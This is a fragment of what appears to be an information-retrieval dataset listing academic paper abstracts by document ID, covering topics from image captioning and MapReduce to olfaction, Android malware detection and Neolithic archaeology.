"text": "Visual attention plays an important role to understand images and demonstrates its effectiveness in generating natural language descriptions of images. On the other hand, recent studies show that language associated with an image can steer visual attention in the scene during our cognitive process. Inspired by this, we introduce a text-guided attention model for image captioning, which learns to drive visual attention using associated captions. For this model, we propose an exemplarbased learning approach that retrieves from training data associated captions with each image, and use them to learn attention on visual features. Our attention model enables to describe a detailed state of scenes by distinguishing small or confusable objects effectively. We validate our model on MSCOCO Captioning benchmark and achieve the state-of-theart performance in standard metrics.",
"title": ""
},
{
"docid": "4dc5aee7d80e2204cc8b2e9305149cca",
"text": "MapReduce offers an ease-of-use programming paradigm for processing large data sets, making it an attractive model for distributed volunteer computing systems. However, unlike on dedicated resources, where MapReduce has mostly been deployed, such volunteer computing systems have significantly higher rates of node unavailability. Furthermore, nodes are not fully controlled by the MapReduce framework. Consequently, we found the data and task replication scheme adopted by existing MapReduce implementations woefully inadequate for resources with high unavailability.\n To address this, we propose MOON, short for MapReduce On Opportunistic eNvironments. MOON extends Hadoop, an open-source implementation of MapReduce, with adaptive task and data scheduling algorithms in order to offer reliable MapReduce services on a hybrid resource architecture, where volunteer computing systems are supplemented by a small set of dedicated nodes. Our tests on an emulated volunteer computing system, which uses a 60-node cluster where each node possesses a similar hardware configuration to a typical computer in a student lab, demonstrate that MOON can deliver a three-fold performance improvement to Hadoop in volatile, volunteer computing environments.",
"title": ""
},
{
"docid": "25e8bbe28852ed0a4175ec8dfaf3b40b",
"text": "Differential evolution (DE) is a well-known optimization algorithm that utilizes the difference of positions between individuals to perturb base vectors and thus generate new mutant individuals. However, the difference between the fitness values of individuals, which may be helpful to improve the performance of the algorithm, has not been used to tune parameters and choose mutation strategies. In this paper, we propose a novel variant of DE with an individual-dependent mechanism that includes an individual-dependent parameter (IDP) setting and an individual-dependent mutation (IDM) strategy. In the IDP setting, control parameters are set for individuals according to the differences in their fitness values. In the IDM strategy, four mutation operators with different searching characteristics are assigned to the superior and inferior individuals, respectively, at different stages of the evolution process. The performance of the proposed algorithm is then extensively evaluated on a suite of the 28 latest benchmark functions developed for the 2013 Congress on Evolutionary Computation special session. Experimental results demonstrate the algorithm's outstanding performance.",
"title": ""
},
{
"docid": "a597592df28e010abdd9b41c48108432",
"text": "This paper deals with the detection of arbitrary static objects in traffic scenes from monocular video using structure from motion. A camera in a moving vehicle observes the road course ahead. The camera translation in depth is known. Many structure from motion algorithms were proposed for detecting moving or nearby objects. However, detecting stationary distant obstacles in the focus of expansion remains quite challenging due to very small subpixel motion between frames. In this work the scene depth is estimated from the scaling of supervised image regions. We generate obstacle hypotheses from these depth estimates in image space. A second step then performs testing of these by comparing with the counter hypothesis of a free driveway. The approach can detect obstacles already at distances of 50m and more with a standard focal length. This early detection allows driver warning and safety precaution in good time.",
"title": ""
},
{
"docid": "b6f3dab3391a594712fdad3b31be2062",
"text": "Social media has become a part of our daily life and we use it for many reasons. One of its uses is to get our questions answered. Given a multitude of social media sites, however, one immediate challenge is to pick the most relevant site for a question. This is a challenging problem because (1) questions are usually short, and (2) social media sites evolve. In this work, we propose to utilize topic specialization to find the most relevant social media site for a given question. In particular, semantic knowledge is considered for topic specialization as it can not only make a question more specific, but also dynamically represent the content of social sites, which relates a given question to a social media site. Thus, we propose to rank social media sites based on combined search engine query results. Our algorithm yields compelling results for providing a meaningful and consistent site recommendation. This work helps further understand the innate characteristics of major social media platforms for the design of social Q&A systems.",
"title": ""
},
{
"docid": "0576e9a526a296f39eb81e1b591985aa",
"text": "Although significant progress has been made in SLAM and object detection in recent years, there are still a series of challenges for both tasks, e.g., SLAM in dynamic environments and detecting objects in complex environments. To address these challenges, we present a novel robotic vision system, which integrates SLAM with a deep neural networkbased object detector to make the two functions mutually beneficial. The proposed system facilitates a robot to accomplish tasks reliably and efficiently in an unknown and dynamic environment. Experimental results show that compare to the state-of-the-art robotic vision systems, the proposed system has three advantages: i) it greatly improves the accuracy and robustness of SLAM in dynamic environments by removing unreliable features from moving objects leveraging the object detector, ii) it builds an instance-level semantic map of the environment in an online fashion using the synergy of the two functions for further semantic applications; and iii) it improves the object detector so that it can detect/recognize objects effectively under more challenging conditions such as unusual viewpoints, poor lighting condition, and motion blur, by leveraging the object map.",
"title": ""
},
{
"docid": "9864597d714ba07b9fc502ab6f1baee3",
"text": "Foreground object segmentation is a critical step for many image analysis tasks. While automated methods can produce high-quality results, their failures disappoint users in need of practical solutions. We propose a resource allocation framework for predicting how best to allocate a fixed budget of human annotation effort in order to collect higher quality segmentations for a given batch of images and automated methods. The framework is based on a proposed prediction module that estimates the quality of given algorithm-drawn segmentations. We demonstrate the value of the framework for two novel tasks related to \"pulling the plug\" on computer and human annotators. Specifically, we implement two systems that automatically decide, for a batch of images, when to replace 1) humans with computers to create coarse segmentations required to initialize segmentation tools and 2) computers with humans to create final, fine-grained segmentations. Experiments demonstrate the advantage of relying on a mix of human and computer efforts over relying on either resource alone for segmenting objects in three diverse datasets representing visible, phase contrast microscopy, and fluorescence microscopy images.",
"title": ""
},
{
"docid": "02bae85905793e75950acbe2adcc6a7b",
"text": "The olfactory system is an essential part of human physiology, with a rich evolutionary history. Although humans are less dependent on chemosensory input than are other mammals (Niimura 2009, Hum. Genomics 4:107-118), olfactory function still plays a critical role in health and behavior. The detection of hazards in the environment, generating feelings of pleasure, promoting adequate nutrition, influencing sexuality, and maintenance of mood are described roles of the olfactory system, while other novel functions are being elucidated. A growing body of evidence has implicated a role for olfaction in such diverse physiologic processes as kin recognition and mating (Jacob et al. 2002a, Nat. Genet. 30:175-179; Horth 2007, Genomics 90:159-175; Havlicek and Roberts 2009, Psychoneuroendocrinology 34:497-512), pheromone detection (Jacob et al. 200b, Horm. Behav. 42:274-283; Wyart et al. 2007, J. Neurosci. 27:1261-1265), mother-infant bonding (Doucet et al. 2009, PLoS One 4:e7579), food preferences (Mennella et al. 2001, Pediatrics 107:E88), central nervous system physiology (Welge-Lüssen 2009, B-ENT 5:129-132), and even longevity (Murphy 2009, JAMA 288:2307-2312). The olfactory system, although phylogenetically ancient, has historically received less attention than other special senses, perhaps due to challenges related to its study in humans. In this article, we review the anatomic pathways of olfaction, from peripheral nasal airflow leading to odorant detection, to epithelial recognition of these odorants and related signal transduction, and finally to central processing. Olfactory dysfunction, which can be defined as conductive, sensorineural, or central (typically related to neurodegenerative disorders), is a clinically significant problem, with a high burden on quality of life that is likely to grow in prevalence due to demographic shifts and increased environmental exposures.",
"title": ""
},
{
"docid": "61fcd05449ecaa60b3c5772eb3efc935",
"text": "Corresponding Author: Suhaib Kh. Hamed Center for Artificial Intelligence Technology (CAIT), Faculty of Information Science and Technology, University Kebangsaan Malaysia, Bangi, 43600, Selangor, Malaysia Tel:0060-1139044355 Email: Suhaib83.programmer@gmail.com Abstract: In spite of great efforts that have been made to present systems that support the user’s need of the answers from the Holy Quran, the current systems of English translation of Quran still need to do more investigation in order to develop the process of retrieving the accurate verse based on user’s question. The Islamic terms are different from one document to another and might be undefined for the user. Thus, the need emerged for a Question Answering System (QAS) that retrieves the exact verse based on a semantic search of the Holy Quran. The main objective of this research is to develop the efficiency of the information retrieval from the Holy Quran based on QAS and retrieving an accurate answer to the user’s question through classifying the verses using the Neural Network (NN) technique depending on the purpose of the verses’ contents, in order to match between questions and verses. This research has used the most popular English translation of the Quran of Abdullah Yusuf Ali as the data set. In that respect, the QAS will tackle these problems by expanding the question, using WordNet and benefitting from the collection of Islamic terms in order to avoid differences in the terms of translations and question. In addition, this QAS classifies the Al-Baqarah surah into two classes, which are Fasting and Pilgrimage based on the NN classifier, to reduce the retrieval of irrelevant verses since the user’s questions are asking for Fasting and Pilgrimage. Hence, this QAS retrieves the relevant verses to the question based on the N-gram technique, then ranking the retrieved verses based on the highest score of similarity to satisfy the desire of the user. According to F-measure, the evaluation of classification by using NN has shown an approximately 90% level and the evaluation of the proposed approach of this research based on the entire QAS has shown an approximately 87% level. This demonstrates that the QAS succeeded in providing a promising outcome in this critical field.",
"title": ""
},
{
"docid": "8c2661934098aa65cd3b6c9e7701eb1c",
"text": "In every educational institution, attendance for students is compulsory to obtain good knowledge of the lessons taught in the classrooms and also for gaining wisdom as well as the personality development. A biometric attendance system is designed and implemented for efficient real time monitoring as well as transparency in the management of student's genuine attendance using GSM based wireless fingerprint terminals (WFTs). This system can be suitable to deploy at the educational institutions. Each individual has a unique pattern of fingerprints motivates the use of them for biometric authentication and are verified for finding the presence of the students in the institute. In this paper, two different approaches are discussed to authenticate the captured fingerprint in the verification process. The first approach uses data base created by the organization itself and the second approach uses the Aadhaar Central Identification Repository (CIDR). Wireless fingerprint terminals are responsible to capture and store the attendance records of the students in the device data base and updating them to the server data base. SMS Alerts to students and their parents are sent in case of their irregularity, absence or shortage of attendance. The same system can be extended for the use of avoiding malpractice in the examinations as a part of examination monitoring system.",
"title": ""
},
{
"docid": "c8967be119df778e98954a7e94bee4ca",
"text": "We consider the problem of predicting real valued scores for reviews based on various categories of features of the review text, and other metadata associated with the review, with the purpose of generating a rank for a given list of reviews. For this task, we explore various machine learning models and evaluate the effectiveness of them through a well known measure for goodness of fit. We also explored regularization methods to reduce variance in the model. Random forests was the most effective regressor in the end, outperforming all the other models that we have tried.",
"title": ""
},
{
"docid": "583f20bb9e308abbaa1223d3a13a0869",
"text": "A plethora of enabling optical and wireless technologies have been emerging that can be used to build future-proof bimodal fiber-wireless (FiWi) broadband access networks. After overviewing key enabling radio-over-fiber (RoF) and radio-andfiber (R&F) technologies and briefly surveying the state of the art of FiWi networks, we introduce an Ethernet-based access-metro FiWi network, called SuperMAN, that integrates next-generation WiFi and WiMAX networks with WDM-enhanced EPON and RPR networks. Throughout the paper we pay close attention to the technical challenges and opportunities of FiWi networks, but also elaborate on their societal benefits and potential to shift the current research focus from optical-wireless networking to the exploitation of personal and in-home computing facilities to create new unforeseen services and applications as we are about to enter the Petabyte age.",
"title": ""
},
{
"docid": "80edb9c7e4bdaca1391ec671f7445381",
"text": "We propose an efficient multikernel adaptive filtering algorithm with double regularizers, providing a novel pathway towards online model selection and learning. The task is the challenging nonlinear adaptive filtering under no knowledge about a suitable kernel. Under this limited-knowledge assumption on an underlying model of a system of interest, many possible kernels are employed and one of the regularizers, a block ℓ1 norm for kernel groups, contributes to selecting a proper model (relevant kernels) in online and adaptive fashion, preventing a nonlinear filter from overfitting to noisy data. The other regularizer is the block ℓ1 norm for data groups, contributing to updating the dictionary adaptively. As the resulting cost function contains two nonsmooth (but proximable) terms, we approximate the latter regularizer by its Moreau envelope and apply the adaptive proximal forward-backward splitting method to the approximated cost function. Numerical examples show the efficacy of the proposed algorithm.",
"title": ""
},
{
"docid": "4c729baceae052361decd51321e0b5bc",
"text": "Learning to hash has attracted broad research interests in recent computer vision and machine learning studies, due to its ability to accomplish efficient approximate nearest neighbor search. However, the closely related task, maximum inner product search (MIPS), has rarely been studied in this literature. To facilitate the MIPS study, in this paper, we introduce a general binary coding framework based on asymmetric hash functions, named asymmetric inner-product binary coding (AIBC). In particular, AIBC learns two different hash functions, which can reveal the inner products between original data vectors by the generated binary vectors. Although conceptually simple, the associated optimization is very challenging due to the highly nonsmooth nature of the objective that involves sign functions. We tackle the nonsmooth optimization in an alternating manner, by which each single coding function is optimized in an efficient discrete manner. We also simplify the objective by discarding the quadratic regularization term which significantly boosts the learning efficiency. Both problems are optimized in an effective discrete way without continuous relaxations, which produces high-quality hash codes. In addition, we extend the AIBC approach to the supervised hashing scenario, where the inner products of learned binary codes are forced to fit the supervised similarities. Extensive experiments on several benchmark image retrieval databases validate the superiority of the AIBC approaches over many recently proposed hashing algorithms.",
"title": ""
},
{
"docid": "7084e2455ea696eec4a0f93b3140d71b",
"text": "Reinforcement learning is a simple, and yet, comprehensive theory of learning that simultaneously models the adaptive behavior of artificial agents, such as robots and autonomous software programs, as well as attempts to explain the emergent behavior of biological systems. It also gives rise to computational ideas that provide a powerful tool to solve problems involving sequential prediction and decision making. Temporal difference learning is the most widely used method to solve reinforcement learning problems, with a rich history dating back more than three decades. For these and many other reasons, devel1 This article is currently not under review for the journal Foundations and Trends in ML, but will be submitted for formal peer review at some point in the future, once the draft reaches a stable “equilibrium” state. ar X iv :1 40 5. 67 57 v1 [ cs .L G ] 2 6 M ay 2 01 4 oping a complete theory of reinforcement learning, one that is both rigorous and useful has been an ongoing research investigation for several decades. In this paper, we set forth a new vision of reinforcement learning developed by us over the past few years, one that yields mathematically rigorous solutions to longstanding important questions that have remained unresolved: (i) how to design reliable, convergent, and robust reinforcement learning algorithms (ii) how to guarantee that reinforcement learning satisfies pre-specified “safely” guarantees, and remains in a stable region of the parameter space (iii) how to design “off-policy” temporal difference learning algorithms in a reliable and stable manner, and finally (iv) how to integrate the study of reinforcement learning into the rich theory of stochastic optimization. In this paper, we provide detailed answers to all these questions using the powerful framework of proximal operators. The most important idea that emerges is the use of primal dual spaces connected through the use of a Legendre transform. This allows temporal difference updates to occur in dual spaces, allowing a variety of important technical advantages. The Legendre transform, as we show, elegantly generalizes past algorithms for solving reinforcement learning problems, such as natural gradient methods, which we show relate closely to the previously unconnected framework of mirror descent methods. Equally importantly, proximal operator theory enables the systematic development of operator splitting methods that show how to safely and reliably decompose complex products of gradients that occur in recent variants of gradient-based temporal difference learning. This key technical innovation makes it possible to finally design “true” stochastic gradient methods for reinforcement learning. Finally, Legendre transforms enable a variety of other benefits, including modeling sparsity and domain geometry. Our work builds extensively on recent work on the convergence of saddle-point algorithms, and on the theory of monotone operators in Hilbert spaces, both in optimization and for variational inequalities. The latter framework, the subject of another ongoing investigation by our group, holds the promise of an even more elegant framework for reinforcement learning. Its explication is currently the topic of a further monograph that will appear in due course. Dedicated to Andrew Barto and Richard Sutton for inspiring a generation of researchers to the study of reinforcement learning. Algorithm 1 TD (1984) (1) δt = rt + γφ ′ t T θt − φt θt (2) θt+1 = θt + βtδt Algorithm 2 GTD2-MP (2014) (1) wt+ 1 2 = wt + βt(δt − φt wt)φt, θt+ 1 2 = proxαth ( θt + αt(φt − γφt)(φt wt) ) (2) δt+ 1 2 = rt + γφ ′ t T θt+ 1 2 − φt θt+ 1 2 (3) wt+1 = wt + βt(δt+ 1 2 − φt wt+ 1 2 )φt , θt+1 = proxαth ( θt + αt(φt − γφt)(φt wt+ 1 2 ) )",
"title": ""
},
{
"docid": "6831c633bf7359b8d22296b52a9a60b8",
"text": "The paper presents a system, Heart Track, which aims for automated ECG (Electrocardiogram) analysis. Different modules and algorithms which are proposed and used for implementing the system are discussed. The ECG is the recording of the electrical activity of the heart and represents the depolarization and repolarization of the heart muscle cells and the heart chambers. The electrical signals from the heart are measured non-invasively using skin electrodes and appropriate electronic measuring equipment. ECG is measured using 12 leads which are placed at specific positions on the body [2]. The required data is converted into ECG curve which possesses a characteristic pattern. Deflections from this normal ECG pattern can be used as a diagnostic tool in medicine in the detection of cardiac diseases. Diagnosis of large number of cardiac disorders can be predicted from the ECG waves wherein each component of the ECG wave is associated with one or the other disorder. This paper concentrates entirely on detection of Myocardial Infarction, hence only the related components (ST segment) of the ECG wave are analyzed.",
"title": ""
},
{
"docid": "5757d96fce3e0b3b3303983b15d0030d",
"text": "Malicious applications pose a threat to the security of the Android platform. The growing amount and diversity of these applications render conventional defenses largely ineffective and thus Android smartphones often remain unprotected from novel malware. In this paper, we propose DREBIN, a lightweight method for detection of Android malware that enables identifying malicious applications directly on the smartphone. As the limited resources impede monitoring applications at run-time, DREBIN performs a broad static analysis, gathering as many features of an application as possible. These features are embedded in a joint vector space, such that typical patterns indicative for malware can be automatically identified and used for explaining the decisions of our method. In an evaluation with 123,453 applications and 5,560 malware samples DREBIN outperforms several related approaches and detects 94% of the malware with few false alarms, where the explanations provided for each detection reveal relevant properties of the detected malware. On five popular smartphones, the method requires 10 seconds for an analysis on average, rendering it suitable for checking downloaded applications directly on the device.",
"title": ""
},
{
"docid": "b03ae1c57ed0e5c49fb99a8232d694d6",
"text": "Introduction The Neolithic Hongshan Culture flourished between 4500 and 3000 BCE in what is today northeastern China and Inner Mongolia (Figure 1). Village sites are found in the northern part of the region, while the two ceremonial sites of Dongshanzui and Niuheliang are located in the south, where villages are fewer (Guo 1995, Li 2003). The Hongshan inhabitants included agriculturalists who cultivated millet and pigs for subsistence, and accomplished artisans who carved finely crafted jades and made thin black-on-red pottery. Organized labor of a large number of workers is suggested by several impressive constructions, including an artificial hill containing three rings of marble-like stone, several high cairns with elaborate interiors and a 22 meter long building which contained fragments of life-sized statues. One fragment was a face with inset green jade eyes (Figure 2). A ranked society is implied by the burials, which include decorative jades made in specific, possibly iconographic, shapes. It has been argued previously that the sizes and locations of the mounded tombs imply at least three elite ranks (Nelson 1996).",
"title": ""
},
{
"docid": "46e81dc6b3b32f61471b91f71672a80f",
"text": "The sparsity of images in a fixed analytic transform domain or dictionary such as DCT or Wavelets has been exploited in many applications in image processing including image compression. Recently, synthesis sparsifying dictionaries that are directly adapted to the data have become popular in image processing. However, the idea of learning sparsifying transforms has received only little attention. We propose a novel problem formulation for learning doubly sparse transforms for signals or image patches. These transforms are a product of a fixed, fast analytic transform such as the DCT, and an adaptive matrix constrained to be sparse. Such transforms can be learnt, stored, and implemented efficiently. We show the superior promise of our approach as compared to analytical sparsifying transforms such as DCT for image representation.",
"title": ""
}
] | scidocsrr |
c0103d497890c4d25b49e8012a051aad | Student engagement and foreign language learning through online social networks | [
{
"docid": "03368de546daf96d5111325f3d08fd3d",
"text": "Despite the widespread use of social media by students and its increased use by instructors, very little empirical evidence is available concerning the impact of social media use on student learning and engagement. This paper describes our semester-long experimental study to determine if using Twitter – the microblogging and social networking platform most amenable to ongoing, public dialogue – for educationally relevant purposes can impact college student engagement and grades. A total of 125 students taking a first year seminar course for pre-health professional majors participated in this study (70 in the experimental group and 55 in the control group). With the experimental group, Twitter was used for various types of academic and co-curricular discussions. Engagement was quantified by using a 19-item scale based on the National Survey of Student Engagement. To assess differences in engagement and grades, we used mixed effects analysis of variance (ANOVA) models, with class sections nested within treatment groups. We also conducted content analyses of samples of Twitter exchanges. The ANOVA results showed that the experimental group had a significantly greater increase in engagement than the control group, as well as higher semester grade point averages. Analyses of Twitter communications showed that students and faculty were both highly engaged in the learning process in ways that transcended traditional classroom activities. This study provides experimental evidence that Twitter can be used as an educational tool to help engage students and to mobilize faculty into a more active and participatory role.",
"title": ""
}
] | [
{
"docid": "ce3d82fc815a965a66be18d20434e80f",
"text": "In this paper the three-phase grid connected inverter has been investigated. The inverter’s control strategy is based on the adaptive hysteresis current controller. Inverter connects the DG (distributed generation) source to the grid. The main advantages of this method are constant switching frequency, better current control, easy filter design and less THD (total harmonic distortion). Since a constant and ripple free dc bus voltage is not ensured at the output of alternate energy sources, the main aim of the proposed algorithm is to make the output of the inverter immune to the fluctuations in the dc input voltage This inverter can be used to connect the medium and small-scale wind turbines and solar cells to the grid and compensate local load reactive power. Reactive power compensating improves SUF (system usage factor) from nearly 20% (in photovoltaic systems) to 100%. The simulation results confirm that switching frequency is constant and THD of injected current is low.",
"title": ""
},
{
"docid": "1f4ccaef3ff81f9680b152a3e7b3d178",
"text": "We propose a method for forecasting high-dimensional data (hundreds of attributes, trillions of attribute combinations) for a duration of several months. Our motivating application is guaranteed display advertising, a multi-billion dollar industry, whereby advertisers can buy targeted (high-dimensional) user visits from publishers many months or even years in advance. Forecasting high-dimensional data is challenging because of the many possible attribute combinations that need to be forecast. To address this issue, we propose a method whereby only a sub-set of attribute combinations are explicitly forecast and stored, while the other combinations are dynamically forecast on-the-fly using high-dimensional attribute correlation models. We evaluate various attribute correlation models, from simple models that assume the independence of attributes to more sophisticated sample-based models that fully capture the correlations in a high-dimensional space. Our evaluation using real-world display advertising data sets shows that fully capturing high-dimensional correlations leads to significant forecast accuracy gains. A variant of the proposed method has been implemented in the context of Yahoo!'s guaranteed display advertising system.",
"title": ""
},
{
"docid": "291c0e0936335f8de3b3944a97b47e25",
"text": "The k-nearest neighbor (k-NN) is a traditional method and one of the simplest methods for classification problems. Even so, results obtained through k-NN had been promising in many different fields. Therefore, this paper presents the study on blasts classifying in acute leukemia into two major forms which are acute myelogenous leukemia (AML) and acute lymphocytic leukemia (ALL) by using k-NN. 12 main features that represent size, color-based and shape were extracted from acute leukemia blood images. The k values and distance metric of k-NN were tested in order to find suitable parameters to be applied in the method of classifying the blasts. Results show that by having k = 4 and applying cosine distance metric, the accuracy obtained could reach up to 80%. Thus, k-NN is applicable in the classification problem.",
"title": ""
},
{
"docid": "c599b08e2a2ff9bab4caf1fc1b1ed51c",
"text": "The quantification of the spectral content of electroencephalogram (EEG) recordings has a substantial role in clinical and scientific applications. It is of particular relevance in the analysis of event-related brain oscillatory responses. This work is focused on the identification and quantification of relevant frequency patterns in motor imagery (MI) related EEGs utilized for brain-computer interface (BCI) purposes. The main objective of the paper is to perform comparative analysis of different approaches to spectral signal representation such as power spectral density (PSD) techniques, atomic decompositions, time-frequency (t-f) energy distributions, continuous and discrete wavelet approaches, from which band power features can be extracted and used in the framework of MI classification. The emphasis is on identifying discriminative properties of the feature sets representing EEG trials recorded during imagination of either left- or right-hand movement. Feature separability is quantified in the offline study using the classification accuracy (CA) rate obtained with linear and nonlinear classifiers. PSD approaches demonstrate the most consistent robustness and effectiveness in extracting the distinctive spectral patterns for accurately discriminating between left and right MI induced EEGs. This observation is based on an analysis of data recorded from eleven subjects over two sessions of BCI experiments. In addition, generalization capabilities of the classifiers reflected in their intersession performance are discussed in the paper.",
"title": ""
},
{
"docid": "2a28c82026952e347406b9996b54383f",
"text": "In the last decade there has been a shift towards development of speech synthesizer using concatenative synthesis technique instead of parametric synthesis. There are a number of different methodologies for concatenative synthesis like TDPSOLA, PSOLA, and MBROLA. This paper, describes a concatenative speech synthesis system based on Epoch Synchronous Non Over Lapp Add (ESNOLA) technique, for standard colloquial Bengali, which uses the partnemes as the smallest signal units for concatenation. The system provided full control for prosody and intonation.",
"title": ""
},
{
"docid": "2eab78b8ec65340be1473086f31eb8c4",
"text": "We present a new family of join algorithms, called ripple joins, for online processing of multi-table aggregation queries in a relational database management system (DBMS). Such queries arise naturally in interactive exploratory decision-support applications.\nTraditional offline join algorithms are designed to minimize the time to completion of the query. In contrast, ripple joins are designed to minimize the time until an acceptably precise estimate of the query result is available, as measured by the length of a confidence interval. Ripple joins are adaptive, adjusting their behavior during processing in accordance with the statistical properties of the data. Ripple joins also permit the user to dynamically trade off the two key performance factors of on-line aggregation: the time between successive updates of the running aggregate, and the amount by which the confidence-interval length decreases at each update. We show how ripple joins can be implemented in an existing DBMS using iterators, and we give an overview of the methods used to compute confidence intervals and to adaptively optimize the ripple join “aspect-ratio” parameters. In experiments with an initial implementation of our algorithms in the POSTGRES DBMS, the time required to produce reasonably precise online estimates was up to two orders of magnitude smaller than the time required for the best offline join algorithms to produce exact answers.",
"title": ""
},
{
"docid": "5da1f7c3459b489564e731cbb41fa028",
"text": "We describe an algorithm and experimental work for vehicle detection using sensor node data. Both acoustic and magnetic signals are processed for vehicle detection. We propose a real-time vehicle detection algorithm called the adaptive threshold algorithm (ATA). The algorithm first computes the time-domain energy distribution curve and then slices the energy curve using a threshold updated adaptively by some decision states. Finally, the hard decision results from threshold slicing are passed to a finite-state machine, which makes the final vehicle detection decision. Real-time tests and offline simulations both demonstrate that the proposed algorithm is effective.",
"title": ""
},
{
"docid": "c453861bda83e4120687832bfa033d23",
"text": "Text generation is a crucial task in NLP. Recently, several adversarial generative models have been proposed to improve the exposure bias problem in text generation. Though these models gain great success, they still suffer from the problems of reward sparsity and mode collapse. In order to address these two problems, in this paper, we employ inverse reinforcement learning (IRL) for text generation. Specifically, the IRL framework learns a reward function on training data, and then an optimal policy to maximum the expected total reward. Similar to the adversarial models, the reward and policy function in IRL are optimized alternately. Our method has two advantages: (1) the reward function can produce more dense reward signals. (2) the generation policy, trained by “entropy regularized” policy gradient, encourages to generate more diversified texts. Experiment results demonstrate that our proposed method can generate higher quality texts than the previous methods.",
"title": ""
},
{
"docid": "17ae594d70605bc24fb3b2e4a63e5d78",
"text": "Mobile phones have been closed environments until recent years. The change brought by open platform technologies such as the Symbian operating system and Java technologies has opened up a significant business opportunity for anyone to develop application software such as games for mobile terminals. However, developing mobile applications is currently a challenging task due to the specific demands and technical constraints of mobile development. Furthermore, at the moment very little is known about the suitability of the different development processes for mobile application development. Due to these issues, we have developed an agile development approach called Mobile-D. The Mobile-D approach is briefly outlined here and the experiences gained from four case studies are discussed.",
"title": ""
},
{
"docid": "1e9e64a89947c08f8ce298d7e0de4183",
"text": "This paper proposes a novel architecture for plug-in electric vehicles (PEVs) dc charging station at the megawatt level, through the use of a grid-tied neutral point clamped (NPC) converter. The proposed bipolar dc structure reduces the step-down effort on the dc-dc fast chargers. In addition, this paper proposes a balancing mechanism that allows handling any difference on the dc loads while keeping the midpoint voltage accurately regulated. By formally defining the unbalance operation limit, the proposed control scheme is able to provide complementary balancing capabilities by the use of an additional NPC leg acting as a bidirectional dc-dc stage, simulating the minimal load condition and allowing the modulator to keep the control on the dc voltages under any load scenario. The proposed solution enables fast charging for PEVs concentrating several charging units into a central grid-tied converter. In this paper, simulation and experimental results are presented to validate the proposed charging station architecture.",
"title": ""
},
{
"docid": "4ddf4cf69d062f7ea1da63e68c316f30",
"text": "The Di†use Infrared Background Experiment (DIRBE) on the Cosmic Background Explorer (COBE) spacecraft was designed primarily to conduct a systematic search for an isotropic cosmic infrared background (CIB) in 10 photometric bands from 1.25 to 240 km. The results of that search are presented here. Conservative limits on the CIB are obtained from the minimum observed brightness in all-sky maps at each wavelength, with the faintest limits in the DIRBE spectral range being at 3.5 km (lIl \\ 64 nW m~2 sr~1, 95% conÐdence level) and at 240 km nW m~2 sr~1, 95% conÐdence level). The (lIl\\ 28 bright foregrounds from interplanetary dust scattering and emission, stars, and interstellar dust emission are the principal impediments to the DIRBE measurements of the CIB. These foregrounds have been modeled and removed from the sky maps. Assessment of the random and systematic uncertainties in the residuals and tests for isotropy show that only the 140 and 240 km data provide candidate detections of the CIB. The residuals and their uncertainties provide CIB upper limits more restrictive than the dark sky limits at wavelengths from 1.25 to 100 km. No plausible solar system or Galactic source of the observed 140 and 240 km residuals can be identiÐed, leading to the conclusion that the CIB has been detected at levels of and 14^ 3 nW m~2 sr~1 at 140 and 240 km, respectively. The intelIl\\ 25 ^ 7 grated energy from 140 to 240 km, 10.3 nW m~2 sr~1, is about twice the integrated optical light from the galaxies in the Hubble Deep Field, suggesting that star formation might have been heavily enshrouded by dust at high redshift. The detections and upper limits reported here provide new constraints on models of the history of energy-releasing processes and dust production since the decoupling of the cosmic microwave background from matter. Subject headings : cosmology : observations È di†use radiation È infrared : general",
"title": ""
},
{
"docid": "e812afed86c4481c70cb80985cc3dc13",
"text": "Viruses that cause chronic infection constitute a stable but little-recognized part of our metagenome: our virome. Ongoing immune responses hold these chronic viruses at bay while avoiding immunopathologic damage to persistently infected tissues. The immunologic imprint generated by these responses to our virome defines the normal immune system. The resulting dynamic but metastable equilibrium between the virome and the host can be dangerous, benign, or even symbiotic. These concepts require that we reformulate how we assign etiologies for diseases, especially those with a chronic inflammatory component, as well as how we design and interpret genome-wide association studies, and how we vaccinate to limit or control our virome.",
"title": ""
},
{
"docid": "4e2fbac1742c7afe9136e274150d6ee9",
"text": "Recently, knowledge graph embedding, which projects symbolic entities and relations into continuous vector space, has become a new, hot topic in artificial intelligence. This paper addresses a new issue of multiple relation semantics that a relation may have multiple meanings revealed by the entity pairs associated with the corresponding triples, and proposes a novel generative model for embedding, TransG. The new model can discover latent semantics for a relation and leverage a mixture of relation-specific component vectors to embed a fact triple. To the best of our knowledge, this is the first generative model for knowledge graph embedding, which is able to deal with multiple relation semantics. Extensive experiments show that the proposed model achieves substantial improvements against the state-of-the-art baselines.",
"title": ""
},
{
"docid": "35553625596fe1e467242c257ed64ebd",
"text": "We present an incremental joint framework to simultaneously extract entity mentions and relations using structured perceptron with efficient beam-search. A segment-based decoder based on the idea of semi-Markov chain is adopted to the new framework as opposed to traditional token-based tagging. In addition, by virtue of the inexact search, we developed a number of new and effective global features as soft constraints to capture the interdependency among entity mentions and relations. Experiments on Automatic Content Extraction (ACE)1 corpora demonstrate that our joint model significantly outperforms a strong pipelined baseline, which attains better performance than the best-reported end-to-end system.",
"title": ""
},
{
"docid": "371be25b5ae618c599e551784641bbcb",
"text": "The paper presents proposal of practical implementation simple IoT gateway based on Arduino microcontroller, dedicated to use in home IoT environment. Authors are concentrated on research of performance and security aspects of created system. By performed load tests and denial of service attack were investigated performance and capacity limits of implemented gateway.",
"title": ""
},
{
"docid": "24297f719741f6691e5121f33bafcc09",
"text": "The hypothesis that cancer is driven by tumour-initiating cells (popularly known as cancer stem cells) has recently attracted a great deal of attention, owing to the promise of a novel cellular target for the treatment of haematopoietic and solid malignancies. Furthermore, it seems that tumour-initiating cells might be resistant to many conventional cancer therapies, which might explain the limitations of these agents in curing human malignancies. Although much work is still needed to identify and characterize tumour-initiating cells, efforts are now being directed towards identifying therapeutic strategies that could target these cells. This Review considers recent advances in the cancer stem cell field, focusing on the challenges and opportunities for anticancer drug discovery.",
"title": ""
},
{
"docid": "da9751e8db176942da1c582908942ce3",
"text": "This paper introduces new types of square-piece jigsaw puzzles: those for which the orientation of each jigsaw piece is unknown. We propose a tree-based reassembly that greedily merges components while respecting the geometric constraints of the puzzle problem. The algorithm has state-of-the-art performance for puzzle assembly, whether or not the orientation of the pieces is known. Our algorithm makes fewer assumptions than past work, and success is shown even when pieces from multiple puzzles are mixed together. For solving puzzles where jigsaw piece location is known but orientation is unknown, we propose a pairwise MRF where each node represents a jigsaw piece's orientation. Other contributions of the paper include an improved measure (MGC) for quantifying the compatibility of potential jigsaw piece matches based on expecting smoothness in gradient distributions across boundaries.",
"title": ""
},
{
